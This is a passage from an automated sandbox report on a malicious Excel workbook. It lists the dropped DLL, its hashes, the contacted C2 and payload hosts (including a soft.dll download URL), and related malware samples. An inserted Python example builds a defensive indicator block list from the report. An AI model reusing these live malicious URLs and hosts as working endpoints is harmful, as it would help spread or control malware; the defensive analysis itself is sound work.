                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://graph.windows.net/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://api.powerbi.com/beta/myorg/importsD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://devnull.onenote.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ncus.pagecontentsync.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://messaging.office.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://augloop.office.com/v2D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://quickbooks.aeymotors.com/soft.dllsharedStrings.bintrue
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            unknown
                                                                                                                                                            https://skyapi.live.net/Activity/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://clients.config.office.net/user/v1.0/macD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                              high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.233.80.31 | authd.feronok.com | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
50.87.220.158 | quickbooks.aeymotors.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
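The URL list and the Contacted IPs table above are what a responder actually takes from a report like this. The following Python is an added example, not part of the Joe Sandbox report: it parses URL rows in the flattened form the text export uses (URL, source file and Malicious flag run together on one line, verdicts and reputation on the following lines), builds a block set from them together with the Contacted IPs table, and runs that set over proxy log lines. The report rows and the IP table are copied from this analysis; the proxy log lines, their field layout, and the remark that 50.87.220.158 is shared hosting are constructed assumptions.

```python
"""Turn the URL and Contacted-IP rows of a Joe Sandbox text export into an IOC set
and run it over proxy log lines.

Added example, not part of the Joe Sandbox report. REPORT_ROWS and CONTACTED_IPS
are copied from this analysis (ID 433009); PROXY_LOG and its field layout are
constructed for the demonstration.
"""
import re
from urllib.parse import urlsplit

# In the text export each URL row is one line with the URL, the source file and the
# Malicious flag run together; antivirus verdicts ("• ...") and the reputation follow
# on their own lines.
REPORT_ROWS = """\
https://quickbooks.aeymotors.com/soft.dllsharedStrings.bintrue
• Avira URL Cloud: malware
unknown
http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/{B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat.29.drtrue
• Avira URL Cloud: safe
unknown
https://outlook.office365.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
high
"""

# IP -> (domain, Malicious flag) as listed in the Contacted IPs table.
CONTACTED_IPS = {
    "185.233.80.31": ("authd.feronok.com", True),
    "50.87.220.158": ("quickbooks.aeymotors.com", False),
}

# Constructed proxy log: "<epoch> <client> <method> <url or host:port> <status>".
PROXY_LOG = """\
1623390568.101 10.0.0.15 GET https://quickbooks.aeymotors.com/soft.dll 200
1623390590.337 10.0.0.15 GET http://authd.feronok.com/c0Zjvpk_/other/path/ 200
1623390601.000 10.0.0.22 GET https://outlook.office365.com/autodiscover/autodiscover.json 200
1623390612.500 10.0.0.31 CONNECT 185.233.80.31:443 200
"""

GUID = r"[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}"
# Source names seen in the export: "<dropped file>.<pid>.dr" or a workbook part (sharedStrings.bin).
SOURCE = rf"(?:\{{{GUID}\}}\.dat\.\d+\.dr|{GUID}\.\d+\.dr|msapplication\.xml\d*\.\d+\.dr|sharedStrings\.bin)"
ROW_RE = re.compile(rf"^(?P<url>https?://\S*?)(?P<source>{SOURCE})(?P<malicious>true|false)$")


def parse_url_rows(text):
    """Split the flattened rows into dicts with url, source, malicious, av and reputation."""
    records = []
    for line in (raw.strip() for raw in text.splitlines()):
        m = ROW_RE.match(line)
        if m:
            records.append({"url": m["url"], "source": m["source"],
                            "malicious": m["malicious"] == "true",
                            "av": [], "reputation": None})
        elif not line or not records:
            continue  # blank, or cells of a row whose URL line is not in the text
        elif line.startswith("•"):
            records[-1]["av"].append(line[1:].strip())
        else:
            records[-1]["reputation"] = line
    return records


def build_iocs(records, contacted_ips=CONTACTED_IPS):
    """Return (hosts, urls, ips) worth blocking.

    The sandbox verdict wins over a single reputation feed: the authd.feronok.com
    URL is Malicious=true although Avira URL Cloud rated it "safe". IPs are taken
    only where the IP table itself says malicious; 50.87.220.158 serves a malicious
    URL but is flagged false (assumed shared hosting), so it is handled by hostname.
    """
    urls = {r["url"] for r in records if r["malicious"]}
    hosts = {urlsplit(u).hostname for u in urls}
    ips = {ip for ip, (_domain, flagged) in contacted_ips.items() if flagged}
    return hosts, urls, ips


def match_log(log_text, hosts, ips):
    """Return (client, target, reason) for log lines hitting an IOC host, subdomain or IP.

    Matching is on hostname rather than the full URL: the flagged C2-style path is
    assumed not to repeat across requests.
    """
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        client, target = parts[1], parts[3]
        host = urlsplit(target).hostname if "://" in target else target.rsplit(":", 1)[0]
        if host in ips:
            hits.append((client, target, "ip " + host))
        elif any(host == h or host.endswith("." + h) for h in hosts):
            hits.append((client, target, "host " + host))
    return hits


if __name__ == "__main__":
    hosts, urls, ips = build_iocs(parse_url_rows(REPORT_ROWS))
    for hit in match_log(PROXY_LOG, hosts, ips):
        print(hit)
```

The parser keys on the Source column's naming conventions rather than on the URL, which is the only way to split the fused lines reliably; a new source pattern in another report needs another alternative in SOURCE. Host matching includes subdomains, and the two Office 365 requests in the log are left alone because the report marks them benign.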

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433009
Start date: 11.06.2021
Start time: 05:05:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 30s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: my_attach_82862.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSB@15/67@7/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 4.7% (good quality ratio 4.4%)
• Quality average: 80.4%
• Quality standard deviation: 27.6%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.43.139.144, 52.109.76.68, 52.109.12.21, 52.109.8.24, 13.88.21.125, 23.218.208.56, 20.82.209.183, 2.20.142.210, 2.20.142.209, 88.221.62.148, 20.54.26.129, 40.126.31.3, 40.126.31.136, 40.126.31.5, 40.126.31.140, 40.126.31.142, 40.126.31.2, 20.190.159.131, 40.126.31.7, 92.122.213.194, 92.122.213.247, 152.199.19.161, 20.54.7.98, 20.54.104.15
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time     | Type            | Description
05:09:28 | API Interceptor | 1x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match         | Associated Sample Name / URL | SHA 256  | Detection | Link   | Context
185.233.80.31 | SecuriteInfo.com..7135.dll   | Get hash | malicious | Browse |

Domains

Match             | Associated Sample Name / URL | SHA 256  | Detection | Link   | Context
authd.feronok.com | SecuriteInfo.com..7135.dll   | Get hash | malicious | Browse | 185.233.80.31
                  | HP7cjYBnlS.dll               | Get hash | malicious | Browse | 47.254.173.212
                  | 1.dll                        | Get hash | malicious | Browse | 34.95.62.189
                  | racial.dll                   | Get hash | malicious | Browse | 35.199.86.111
                  | racial.dll                   | Get hash | malicious | Browse | 35.199.86.111
                  | racial.dll                   | Get hash | malicious | Browse | 35.199.86.111
                  | racial.dll                   | Get hash | malicious | Browse | 35.199.86.111
                  | racial.dll                   | Get hash | malicious | Browse | 35.199.86.111
                  | racial.dll                   | Get hash | malicious | Browse | 35.199.86.111
                  | info_71411.vbs               | Get hash | malicious | Browse | 35.199.86.111
                  | racial.dll                   | Get hash | malicious | Browse | 35.199.86.111
                  | racial.dll                   | Get hash | malicious | Browse | 35.199.86.111
                  | soft.dll                     | Get hash | malicious | Browse | 35.199.86.111
                  | racial.dll                   | Get hash | malicious | Browse | 35.199.86.111
                  | racial.dll                   | Get hash | malicious | Browse | 35.199.86.111
                  | Know.dll                     | Get hash | malicious | Browse | 35.199.86.111

ASN

Match                    | Associated Sample Name / URL | SHA 256  | Detection | Link   | Context
UNIFIEDLAYER-AS-1US      | Fax_Doc#01_5.html | Get hash | malicious | Browse | 162.241.7.171
                         | WcCEh3daIE.xls | Get hash | malicious | Browse | 162.241.77.193
                         | KCTC International Ltd.exe | Get hash | malicious | Browse | 192.254.185.244
                         | lTAPQJikGw.exe | Get hash | malicious | Browse | 74.220.199.8
                         | supply us this product.exe | Get hash | malicious | Browse | 50.87.146.199
                         | #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTM | Get hash | malicious | Browse | 192.185.74.169
                         | 3arZKnr21W.exe | Get hash | malicious | Browse | 192.254.235.195
                         | 6b6zVfqxbk.xlsb | Get hash | malicious | Browse | 216.172.184.23
                         | HM-20210428 HBL.exe | Get hash | malicious | Browse | 192.254.180.165
                         | INQUIRY. ZIP.exe | Get hash | malicious | Browse | 50.87.190.227
                         | audit-78958169.xlsb | Get hash | malicious | Browse | 192.185.113.120
                         | research-1315978726.xlsb | Get hash | malicious | Browse | 216.172.184.23
                         | ExHNIXd73f.exe | Get hash | malicious | Browse | 108.167.142.232
                         | research-2012220787.xlsb | Get hash | malicious | Browse | 216.172.184.23
                         | research-2012220787.xlsb | Get hash | malicious | Browse | 216.172.184.23
                         | viVrtGR9Wg.xlsb | Get hash | malicious | Browse | 192.185.113.120
                         | DEMLwnv0Nt.xlsb | Get hash | malicious | Browse | 192.185.113.120
                         | audit-367497006.xlsb | Get hash | malicious | Browse | 192.185.113.120
                         | analysis-31947858.xlsb | Get hash | malicious | Browse | 108.167.156.223
                         | analysis-1593377733.xlsb | Get hash | malicious | Browse | 108.167.156.223
SUPERSERVERSDATACENTERRU | SecuriteInfo.com..7135.dll | Get hash | malicious | Browse | 185.233.80.31
                         | 2 - #U041c#U0412#U0421 #U0423#U041a#U0420#U0410#U0407#U041d#U0418 - signed - (8uy).cpl | Get hash | malicious | Browse | 46.17.104.120
                         | 2 - #U041c#U0412#U0421 #U0423#U041a#U0420#U0410#U0407#U041d#U0418 - signed - (8uy).cpl | Get hash | malicious | Browse | 46.17.104.120
                         | 8s5P8pdch5.exe | Get hash | malicious | Browse | 185.233.81.8
                         | 0CUmIGFwMf.exe | Get hash | malicious | Browse | 185.232.170.88
                         | y1e1FV1UWs.exe | Get hash | malicious | Browse | 185.232.170.88
                         | 091WJ1BnKf.exe | Get hash | malicious | Browse | 45.144.64.230
                         | svchost10.exe | Get hash | malicious | Browse | 45.144.65.97
                         | index.exe | Get hash | malicious | Browse | 185.232.170.29
                         | NATO_042021-1re4.doc | Get hash | malicious | Browse | 185.232.170.29
                         | 8UOSzpl9E1.exe | Get hash | malicious | Browse | 185.180.231.94
                         | UWbkgpAQuS.exe | Get hash | malicious | Browse | 147.78.67.95
                         | 9MyoOYNXKe.exe | Get hash | malicious | Browse | 185.195.27.245
                         | LJiW5jWnuA.exe | Get hash | malicious | Browse | 147.78.67.95
                         | tFqfAPK60I.exe | Get hash | malicious | Browse | 147.78.67.95
                         | svchost.exe | Get hash | malicious | Browse | 45.144.65.97
                         | m2.exe | Get hash | malicious | Browse | 45.144.64.88
                         | 2.exe | Get hash | malicious | Browse | 45.144.64.88
                         | m4.exe | Get hash | malicious | Browse | 45.144.64.88
                         | 4.exe | Get hash | malicious | Browse | 45.144.64.88

JA3 Fingerprints

Match                            | Associated Sample Name / URL | SHA 256  | Detection | Link   | Context
37f463bf4616ecd445d4a1937da06e19 | document-47-2637.xls | Get hash | malicious | Browse | 50.87.220.158
                                 | logo.png.exe | Get hash | malicious | Browse | 50.87.220.158
                                 | document-47-2637.xls | Get hash | malicious | Browse | 50.87.220.158
                                 | Fax_Doc#01_5.html | Get hash | malicious | Browse | 50.87.220.158
                                 | wa71myDkbQ.exe | Get hash | malicious | Browse | 50.87.220.158
                                 | Current-Status-062021-81197.xlsb | Get hash | malicious | Browse | 50.87.220.158
                                 | logo.png.exe | Get hash | malicious | Browse | 50.87.220.158
                                 | 3F97s4aQjB.xlsx | Get hash | malicious | Browse | 50.87.220.158
                                 | WcCEh3daIE.xls | Get hash | malicious | Browse | 50.87.220.158
                                 | ATT00005.htm | Get hash | malicious | Browse | 50.87.220.158
                                 | kxjeAvsg1v.exe | Get hash | malicious | Browse | 50.87.220.158
                                 | VSA75RUmYZ.exe | Get hash | malicious | Browse | 50.87.220.158
                                 | iX22xMeXIc.exe | Get hash | malicious | Browse | 50.87.220.158
                                 | QWkt5w3cO2.exe | Get hash | malicious | Browse | 50.87.220.158
                                 | #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTM | Get hash | malicious | Browse | 50.87.220.158
                                 | vTtOheCXBQ.exe | Get hash | malicious | Browse | 50.87.220.158
                                 | 6b6zVfqxbk.xlsb | Get hash | malicious | Browse | 50.87.220.158
                                 | Check 57549.Html | Get hash | malicious | Browse | 50.87.220.158
                                 | audit-78958169.xlsb | Get hash | malicious | Browse | 50.87.220.158
                                 | Docc.html | Get hash | malicious | Browse | 50.87.220.158

Dropped Files

No context

Created / dropped Files

C:\Users\Public\SettingSyncY.dll
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 886272
Entropy (8bit): 5.674513513570937
Encrypted: false
SSDEEP: 24576:Ydk22FB2tfgklpVM5HdBcvLrXmF63WaSc:YdkDT29zaVg3WaSc
MD5: 5BA7AC7FA4F9E831679832B6CC22AEE8
SHA1: 813DF24AC22C2666B28BC3E7FB9BD1EEF2A7F395
SHA-256: D2C19AC3EACE29239BF919C442556ABF782DA5953325EE6B2626482FBF442F29
SHA-512: A345B0749D5745640FD7908CDB142960DA22AC6029BAFDDC0666D11EB5033756C3CFDE84D2FB94DCBF418DF40D2CE49EC4A18B919714402B7045B96E619A27CD
Malicious: true
Antivirus:
• Metadefender, Detection: 6%
• ReversingLabs, Detection: 4%
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{99BBC3EB-CAAD-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 29272
Entropy (8bit): 1.7725011658677239
Encrypted: false
SSDEEP: 48:IwhoGcprPzGwpLhaG/ap8GBGIpcgdihI1GvnZpvgdih4Goo1qp9gdihRGo4cEZpo:rmZlZa2IW0Gt0nf09lM0wQBgB
MD5: FD403206FBACF7BA1922FFEB229A78E9
SHA1: 002B50B3B9B71BAF1D82B31E35987F42572A00A5
SHA-256: AB6C3DCC02DB8F8214D71C9249B0DFDC4C0F215ADF18F158A835B4A85E9B50DA
SHA-512: 47B4E2A4EEADFDBB43B5317A114BDEEA051E184FFE9D52CF13BF60C14963FC1C7D04B8AC2230589028068416F77C62A8B4F337C61A0EC173B021E4DBCA8A530F
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B403EC42-CAAD-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 29272
Entropy (8bit): 1.7731605803059567
Encrypted: false
SSDEEP: 48:IwpGcproGwpLByG/ap8BP7GIpcBRA5GvnZpvBRAHGo2qp9BRARGo4lpmBRnjGWEE:rvZwZe2/WPbtP6fPxlMPpz4EB
MD5: 8B153FC719E2A3E5D5199D05526C1B0B
SHA1: 9E8B931ABFC5730E7E12E9CC2337102C868B66CF
SHA-256: 6BFC1E01DAD1EC91AE4753B1C5F0C423A18B022CD638A23E0546B87F8CE52A38
SHA-512: AA7792863EF894CBFDF4AA8ECEE90B785BC6FF2B84FF783BDCE5797114E6FA4550FD38BAA07D6D894B555C47857CB9875452FAB1267F0218AC688C99C13B92AB
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C1F50A27-CAAD-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 29272
Entropy (8bit): 1.7753706536991711
Encrypted: false
SSDEEP: 48:IwmEGcprEvGwpLp2G/ap8L9GIpchDNBGvnZpvhDsXGoalq1qp9hDXnWGo4GlqOly:rmYZEZZp02LvWhxOthHfh7RxMh1coXuB
MD5: 45CE2DF9248F6EC1A9F3E0A8354CA162
SHA1: 18E7FA0CC9C5ACEAB87D701AA684C51132237CAA
SHA-256: D0D79EB236F673501C6B2142B0E0C8786F3665D4241944DE2F993D3E160230EF
SHA-512: 4BE21DF11415B8E7F6F9071BE63A2F5EB35DC68127769B66EAFCA83DB2BF6B877ABCE9AFCF212A546889824062105778D79C31001D9A1256FCF481000A0847C2
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFEFB1DC-CAAD-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 29272
Entropy (8bit): 1.7760345703977574
Encrypted: false
SSDEEP: 48:IwxGcprIGwpL8G/ap88clhGIpc8+FRGvnZpv8+FPGodqp98+FNGo4hpm8+2CGWne:rHZQZ+2ZljWPAtPyfP0hMPHcgOB
MD5: CD681ED6E3AB41F9B2BC5DD6D8FFF1EE
SHA1: 3E384D392345F855F4744B727DA329BDEE4F5A01
SHA-256: 93E4EDC208F1351F9BA4C9ADC6A25282744F23CA333270409F11A1B77E5CE594
SHA-512: FE70E480B75873D80E5CB03A8200419559AF7DE2E675637FE9512418D0BE0935F09B40CABE3ABBB370B34224365C0820A66011AC8B3589B057FD57357E4FB67F
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99BBC3ED-CAAD-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 27576
Entropy (8bit): 1.9130107085336352
Encrypted: false
SSDEEP: 96:rCZpQp6nBS/jp2xWmMGiUg3DTDp75ksg3DTDp7FCA:rCZpQp6nk/jp2xWmMGxYzp75lYzp7kA
MD5: A8EF5B0FD756BE9A78CFC806E96CE89C
SHA1: 9296E6BB2974CE1A339E0AE36ED537F91A59D0EB
SHA-256: 308836901656334D15ADA144BC333223C8AC95AA5C861BE928C961160EC83F77
SHA-512: 45ED4601AC2859B1992EC7AF17ABCDB4370C62BEB17A21FD32FA9BEF0233DB593D1297E7CA25EFABEE74D6F2D80A1F47DE6A525A93582A88AAE73B992FBC581E
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 27588
Entropy (8bit): 1.914931709058199
Encrypted: false
SSDEEP: 192:rSZTVQR63kDjd2FWlM5VLMPKV5BFVLMPKV5YsA:rO+s0PUcmHL8KVLL8KVWH
MD5: EC0378B9FD41FFC29F2D39AB7457E30B
SHA1: 4699E57B1EEEC0AC8C39CFC52AF428F9379F9E6F
SHA-256: BFAF1575FBDA07B353E1A828C018FC9B5EE9A3F083B21222E653C97BB96B8111
SHA-512: 30AE3D2843D90FBE25749603C668503A3530942D6BBAAA066D2232FC9130B49C7DF3A47F9B9BFB4BE5AF7BE25CE3D135E527EE8FB5173836169308C5DED63B0F
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C1F50A29-CAAD-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 28144
Entropy (8bit): 1.9207168531889898
Encrypted: false
SSDEEP: 192:rnZIQA6ak+jV2ZWJMlZ0cHXGT10c1cHX9A:rZxrz4MISHnHWJn6H+
MD5: 54F420FC6D17AFC3213AC8178D548349
SHA1: D9931600D39445431E50841406AD061FC2649C44
SHA-256: 429B50DBA0BF58729F62240F0A6F07980A4399B6AB4715DAD8E7D0DFA9BF448F
SHA-512: 79D5F396F0B3A4AE0CCC48E3D47AF50D0E1FDF6980DFA1E8C532E86F878C9A0189055EA508318599D994FA7BB4EE9E3F6DB682D39CF8A6AB1D6858073B3F73F2
Malicious: false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CFEFB1DE-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):27592
                                                                                                                                                                Entropy (8bit):1.918492100727991
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:ruZtQsA6WUBSTlbjh2USWYMQBc4UOolc4UOZA:ruZtQ16LkT1jh2ZWYMQBcROolcROZA
                                                                                                                                                                MD5:79D56166307B15993F3386A3A638376C
                                                                                                                                                                SHA1:A91AD9DAF8050BFFAFE18622F144902233ADFCA7
                                                                                                                                                                SHA-256:4A7A62EAF46954B9853038B0A7ACF3F68EF90704C589472AB9E41E7477286AF1
                                                                                                                                                                SHA-512:C9829231BEAEBE5C3A4B4529EE04D15EBE445BFB83F73829AD37C5EEA5F468397F1C7A9947ACCE9494B277FE57082A688E2028B08F86B949F28B00E46930B074
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.117856519163228
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxOEV3N3TnWimI002EtM3MHdNMNxOEV3N3TnWimI00ObVbkEtMb:2d6NxOU3N3TSZHKd6NxOU3N3TSZ76b
                                                                                                                                                                MD5:621EB656303E8270283EABFCF11F9854
                                                                                                                                                                SHA1:6526C70DE9143018456B6CA4EA35E4F0B8CA88E4
                                                                                                                                                                SHA-256:2920B7AC67CC5F1B544077642FABBC14C8D88CAD1BD0A90D623CC2A208A78500
                                                                                                                                                                SHA-512:8667901B40741E1CB1143A4F298437D50356DDB7A26EAFD255A95EF79FACC14569142544A3EA2EC613C23372F9A06632A146DA188DE96B0FEF95178C027A8892
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653
                                                                                                                                                                Entropy (8bit):5.106728622068366
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxe2kZnWimI002EtM3MHdNMNxe2kZnWimI00Obkak6EtMb:2d6NxroSZHKd6NxroSZ7Aa7b
                                                                                                                                                                MD5:D6A6DE7380D449E1E193FF1F7B3F8F9F
                                                                                                                                                                SHA1:28EC605B64FA91700DA2E8E2257AAE98465F5B93
                                                                                                                                                                SHA-256:3D41E628656CE87C4774567A257251E1322DC8CFF7DE8A0A140A62064F77F248
                                                                                                                                                                SHA-512:338E693D50BC2A8C7AACE28A54C5B0AF3D42B46E61657EEE73515D8911A44C0A2328AC171D2A176BA6073B04C65DE482BC8ABDF170B6D5764955FBCF0B4DB18C
                                                                                                                                                                Malicious:false
